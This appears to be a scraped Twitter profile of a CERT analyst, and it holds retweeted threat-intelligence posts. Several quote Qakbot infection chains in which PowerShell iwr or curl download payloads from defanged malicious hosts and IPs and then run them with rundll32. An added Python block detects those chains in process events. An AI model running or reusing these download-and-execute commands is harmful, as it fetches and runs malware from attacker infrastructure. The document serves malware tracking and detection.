Security Boi (@0x49736b)'s Twitter Profile
Security Boi

@0x49736b

CERT Analyst ~ BleuBytes

ID: 941954338074873856

Joined 16-12-2017 08:53:09

444 Tweets

180 Followers

275 Following

proxylife (@pr0xylife):

#Qakbot - azd - .zip > .wsf > (decoy .pdf) > .dll

WScript.exe Adobe Cloud Certificate 133337.wsf

rundll32.exe C:\ProgramData\Z6x9E9.SmcisaK,Wind

Samples 👇

bazaar.abuse.ch/sample/1b3b1a8…

bazaar.abuse.ch/sample/e99726f…

IOCs
github.com/pr0xylife/Qakb…
proxylife (@pr0xylife):

#Qakbot - tok01 - .one > .ps  > .dll > (decoy .pdf)

cmd.exe /c ngops.bat

poweRshell -C iwr http://waojernote.]com/images/1.gif -o C:\ProgramData\lesian.dat

poweRshell -C Start-Sleep 12

rundll32 C:\ProgramData\lesian.dat,Wind

IOCs
github.com/pr0xylife/Qakb…
proxylife (@pr0xylife):

#Qakbot - BB15 - .one > .jse > .bat > .ps > .dll

WScript.exe Open.jse

cmd.exe /c default.bat

powershell iwr -uri http://104.236.1.43/YXF/150223.gif -o %temp%\aTgzWLspf.tmp

RunDLL32 %temp%\aTgzWLspf.tmp,Wind

IOCs
github.com/pr0xylife/Qakb…
proxylife (@pr0xylife):

#Qakbot - tok01 - .one > .wsf  > .cmd >  ps > .dll

WScript.exe Open.wsf

cmd.exe /c r.cmd

poweRshell.exe -C iwr http://baracundofres.]com/images/150223.gif -OutFile rei.dat

poweRshell.exe -C Start-Sleep 11

rundll32.exe rei.dat,Wind

IOCs
github.com/pr0xylife/Qakb…
ExecuteMalware (@executemalware):

Again today, I received emails leading to an (as yet, still) unidentified #malware sample. Pretty heavily obfuscated scripts - fun puzzles.

Here's what I saw:
github.com/executemalware…
proxylife (@pr0xylife):

#Qakbot - BB15 - .one > .wsf > curl > .dll

wscript.exe mikey.wsf

cmd.exe /c curl -o fd.dll http://64.225.8.]202/1Moch7/160223 && rundll32 fd.dll,N115

Samples 👇

bazaar.abuse.ch/sample/f836077…

bazaar.abuse.ch/sample/6f99171…

IOCs
github.com/pr0xylife/Qakb…
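The four Qakbot chains above (azd, tok01, BB15) share one shape once the archive or .one lure is opened: a script host runs the .wsf/.jse, which spawns cmd.exe, which fetches a payload with PowerShell iwr or curl under a misleading name (a .gif URL saved as .dat, an extension-less URL saved as .dll, a .tmp in %temp%), and rundll32 is then handed that file with an export such as Wind or N115. The block below is an added example, not code from @pr0xylife or the linked IOC repository: four process-creation rules plus a parent-chain walk, run over constructed Sysmon-style events whose PIDs and image paths are invented while the command lines are the ones quoted in the tweets. The defanged `.]` in the URLs is accepted as-is so the rules can be tested directly against published IOCs.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DLL_EXTS = {".dll", ".cpl", ".ocx", ".ax"}   # what rundll32 is normally handed
# Constructed Sysmon-EID-1-shaped events mirroring the tok01 (.wsf > .cmd > ps > .dll) and
# BB15 (.wsf > curl > .dll) chains above; PIDs and image paths are invented, not real telemetry.
S32 = r"C:\Windows\System32"
PS = S32 + r"\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcEvent(200, 100, S32 + r"\wscript.exe", "WScript.exe Open.wsf"),
    ProcEvent(300, 200, S32 + r"\cmd.exe", "cmd.exe /c r.cmd"),
    ProcEvent(400, 300, PS, "poweRshell.exe -C iwr http://baracundofres.]com/images/150223.gif -OutFile rei.dat"),
    ProcEvent(600, 300, S32 + r"\rundll32.exe", "rundll32.exe rei.dat,Wind"),
    ProcEvent(700, 100, S32 + r"\wscript.exe", "wscript.exe mikey.wsf"),
    ProcEvent(800, 700, S32 + r"\cmd.exe", "cmd.exe /c curl -o fd.dll http://64.225.8.]202/1Moch7/160223 && rundll32 fd.dll,N115"),
    ProcEvent(900, 800, S32 + r"\rundll32.exe", "rundll32 fd.dll,N115"),
    # benign look-alikes the rules must not flag
    ProcEvent(1000, 100, S32 + r"\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent(1100, 100, PS, "powershell -C iwr https://example.com/tool.exe -OutFile tool.exe"),
]
DL_RE = re.compile(r"(?:\biwr\b|\binvoke-webrequest\b|\bcurl(?:\.exe)?\b)(?P<args>.*)", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
OUT_RE = re.compile(r'(?:-o|-outfile|-out)\s+(?P<out>"[^"]+"|\S+)', re.I)

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def ext_of(name: str) -> str:
    """Lower-cased extension of the last path segment ('' if none)."""
    base = name.replace("/", "\\").rsplit("\\", 1)[-1]
    return "." + base.rsplit(".", 1)[1].lower() if "." in base else ""

def url_file(url: str) -> str:
    """Last path segment of a URL (defanged '.]' / '[.]' accepted), query string stripped."""
    url = url.replace("[.]", ".").replace(".]", ".").replace("[.", ".")
    path = url.split("://", 1)[-1].partition("/")[2]        # '' when the URL has no path
    return path.split("?", 1)[0].rsplit("/", 1)[-1]

def parse_download(cmdline: str):
    """(url, output path) for an iwr / Invoke-WebRequest / curl -o command line, else None."""
    m = DL_RE.search(cmdline)
    u, o = (URL_RE.search(m.group("args")), OUT_RE.search(m.group("args"))) if m else (None, None)
    return (u.group(0), o.group("out").strip('"')) if u and o else None

def rundll32_module(ev: ProcEvent):
    """(module, export) from a rundll32 command line, None if ev is not rundll32."""
    args = ev.cmdline.split(None, 1)
    if basename(ev.image) != "rundll32.exe" or len(args) < 2:
        return None
    module, _, export = args[1].strip().partition(",")
    return module.strip().strip('"'), export.strip().split(" ")[0]

def evaluate(events):
    """Apply the four rules; returns pid -> names of the rules that fired."""
    by_pid = {e.pid: e for e in events}
    downloads = {e.pid: d for e in events if (d := parse_download(e.cmdline))}
    downloaded = {basename(path) for _, path in downloads.values()}
    findings = {}
    for ev in events:
        rules = []
        parent = by_pid.get(ev.ppid)
        # 1. the .wsf/.jse stage (a script host) spawning cmd or powershell
        if parent and basename(parent.image) in SCRIPT_HOSTS and basename(ev.image) in SHELLS:
            rules.append("script_host_spawns_shell")
        # 2. the fetched object is renamed on disk (.gif -> .dat, no extension -> .dll)
        if ev.pid in downloads and ext_of(url_file(downloads[ev.pid][0])) != ext_of(downloads[ev.pid][1]):
            rules.append("download_ext_mismatch")
        # 3./4. rundll32 handed a module not named like a DLL, or the very file a download wrote
        m = rundll32_module(ev)
        if m and ext_of(m[0]) not in DLL_EXTS:
            rules.append("rundll32_non_dll_module")
        if m and basename(m[0]) in downloaded:
            rules.append("rundll32_loads_downloaded_file")
        if rules:
            findings[ev.pid] = rules
    return findings

def chains(events, findings):
    """Root-first PID path from the script host down to each flagged rundll32."""
    by_pid = {e.pid: e for e in events}
    result = []
    for pid in (p for p, r in findings.items() if any(x.startswith("rundll32") for x in r)):
        path, cur = [], by_pid[pid]
        while cur and basename(cur.image) not in SCRIPT_HOSTS:
            path.append(cur.pid)
            cur = by_pid.get(cur.ppid)
        if cur:
            result.append([cur.pid] + path[::-1])
    return result
```

On the constructed events, `evaluate(EVENTS)` flags PIDs 300, 400, 600, 800 and 900 and leaves the Control Panel applet and the unrenamed tool.exe download alone; `chains()` returns `[[200, 300, 600], [700, 800, 900]]`, the two wscript-to-rundll32 paths. Rule 2 (extension mismatch) is the noisy one on its own, since renaming a download is common; its value here is that rule 4 correlates the written file name with what rundll32 later loads, which is the pairing every chain above exhibits. The rules key on the command-line forms visible in these tweets and will miss other downloaders (certutil, bitsadmin, Start-BitsTransfer) unless DL_RE is extended.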
Botconf (@botconf):

The #Botconf2024 CFP is now available (sorry for the little delay) and the deadline is the same: 1st December 2023.
botconf.eu/call-for-propo…
Team Cymru Threat Research (@teamcymru_s2):

#QakBot's summer break through the lens of NetFlow data

The attached image charts traffic volumes from QakBot C2s to their upstream Tier 2 servers located in #Russia 

Based on our visibility, things began to go quiet after 2 June (spamming ceased later) ☀️🍹🏖️

#PureSignal #PTO
Team Cymru Threat Research (@teamcymru_s2):

BLOG POST: Part 2 of our high-level tracking of #QakBot infrastructure. Characterising #C2 servers and their relationship with the upstream hosts (located in 🇷🇺) used to manage them. team-cymru.com/post/visualizi…

proxylife (@pr0xylife):

#TA577 - Back on the scene pushing #Darkgate

Time to resume tracking operations, welcome back Tramp.

Distro 👇

url > zip > lnk

url > xll

pdf > url > xll > msi

Samples 👇

bazaar.abuse.ch/sample/026f4c9…

bazaar.abuse.ch/sample/2eee7af…

bazaar.abuse.ch/sample/bb2434f…

bazaar.abuse.ch/sample/5bc060b…

Greg Lesnewich (@greglesnewich):

The whole gang got up for this one to wrap up on TA422 (aka APT28, Fancy Bear, Forest Blizzard, FROZENLAKE, BlueDelta, Sednit, etc.) spraying n-day exploits August through November 

proofpoint.com/us/blog/threat…

TL;DR:
Zeroed (@zeroedtech):

How much do you know about IIS Machine Keys and View State? Are you confident you could not only identify an exploited host but also remediate it? If not, check out my new blog post which covers exploitation, detection and remediation zeroed.tech/blog/viewstate…

Seika.io (@seika_io):

Seika.io is now in open beta. 🚀 We're a new internet listener aiming at providing threat intelligence context thanks to our sensors around the globe. seika.io/blog/2024/08/l…

DFIR-IRIS (@dfir_iris):

🎉 IRIS 2.4.12 is out now, bringing a shiny new module for Seika.io, enhanced webhook capabilities, spelling in editors! 🚀 Check it out here: docs.dfir-iris.org/2.4.12/changel… and Seika.io

John Breth (JB) | CyberInsight® on YouTube (@jbizzle703):

Give this a look, it's called GHOSTS, it allows you to simulate/automate different types of user traffic/activities. Normally used for cybersecurity testing, it might work for what you need. github.com/cmu-sei/GHOSTS

The DFIR Report (@thedfirreport):

🎉 DFIR Labs CTF Winners🎉
 
We’re thrilled to announce the winners of our latest CTF:
 
🏆 1st Place: Security Boi (@0x49736b)
🥈 2nd Place: Satyender Yadav (@thedeadthinker)
🥉 3rd Place: p500
 
A big thank you to all participants and supporters for making this event a success!
watchTowr (@watchtowrcyber):

Expression payloads meet mayhem in this week's Ivanti EPMM vulnerabilities — CVE-2025-4427 and CVE-2025-4428 — chained to achieve unauth RCE. Beware - this is currently being exploited ITW! Enjoy our analysis. labs.watchtowr.com/expression-pay…